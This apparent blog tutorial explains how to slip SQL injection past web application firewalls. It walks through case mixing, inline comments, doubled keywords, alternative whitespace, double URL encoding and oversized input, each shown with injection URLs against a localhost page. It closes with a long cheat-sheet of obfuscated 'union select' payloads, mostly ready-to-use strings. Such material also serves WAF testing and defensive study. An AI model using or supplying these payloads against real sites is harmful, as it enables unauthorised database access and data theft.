Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.
What is WAF?
WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.How does it Work?
When WAF detects any malicious input from end user, It gives 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors
What to do next?
So, what to do next? we cant do our further injection right?
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:
# Case Changing:
Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case.
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt
# Using Comments
SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g
// , -- , --+ , #, -- -
# Inline Comments
Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--
Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.
Anyways, We were talking about Filtered Keywords. So it does not mean that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--
# Double use of Keywords
Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.
# Using Different types of Whitespaces
Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as wellfor example + .
%20 is use for space, but we can try using one of these whitespaces . some examples are %09 %0A %0B %0C %0D %A0
inurl:
union%0Bselect%0B1,2,3--
# Encoding
We can always try our luck with URL encode thing to bypass WAF. For example we can use
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()but sometime waf filter also filter % itself. So we have to use double URL encoding in that case
as
union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529
# Unexpected Input
This scenario is very rare that we have to use buffer overflow or give unexpected query /request to trick WAF filters.
for example:
This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow
http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--
# use all above mentioned techniques together
ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.
#Some Common Union Select Solutions:
%55nion(%53elect 1,2,3)-- -I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time.
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
Post a Comment